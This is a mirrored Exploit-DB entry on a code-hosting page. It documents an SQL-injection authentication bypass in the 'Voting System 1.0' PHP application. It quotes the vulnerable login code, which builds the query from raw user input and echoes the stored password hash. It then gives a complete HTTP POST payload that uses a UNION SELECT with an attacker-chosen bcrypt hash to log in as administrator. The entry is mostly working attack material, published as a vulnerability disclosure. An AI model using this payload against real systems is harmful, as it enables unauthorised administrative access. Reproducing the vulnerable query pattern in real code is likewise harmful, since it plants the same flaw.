bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/49843.txt
Offensive Security e4f4680368 DB: 2021-05-08 
10 changes to exploits/shellcodes

Sandboxie 5.49.7 - Denial of Service (PoC)
Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation
Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path
WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path
Epic Games Rocket League 1.95 - Stack Buffer Overrun

Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
Voting System 1.0 - Authentication Bypass (SQLI)
Voting System 1.0 - Remote Code Execution (Unauthenticated)
Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: May 3rd 2021
2021-05-08 05:01:52 +00:00

60 lines
No EOL
2.3 KiB
Text
Raw Blame History

# Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI)
# Date: 06/05/2021
# Exploit Author: secure77
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB
You can simply bypass the /admin/login.php with the following sql injection.
All you need is a bcrypt hash that is equal with your random password, the username should NOT match with an existing
########################### Vulnerable code ############################
if(isset($_POST['login'])){
$username = $_POST['username'];
$password = $_POST['password'];
$sql = "SELECT * FROM admin WHERE username = '$username'";
$query = $conn->query($sql);
if($query->num_rows < 1){
$_SESSION['error'] = 'Cannot find account with the username';
}
else{
$row = $query->fetch_assoc();
echo "DB Password: " . $row['password'];
echo "<br>";
echo "<br>";
echo "Input Password: " . $password;
if(password_verify($password, $row['password'])){
echo "Equal";
$_SESSION['admin'] = $row['id'];
}
else{
echo "not Equal";
$_SESSION['error'] = 'Incorrect password';
}
}
}
else{
$_SESSION['error'] = 'Input admin credentials first';
}
########################### Payload ############################
POST /admin/login.php HTTP/1.1
Host: 192.168.1.1
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=tliephrsj1d5ljhbvsbccnqmff
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -
Reference in a new issue View git blame Copy permalink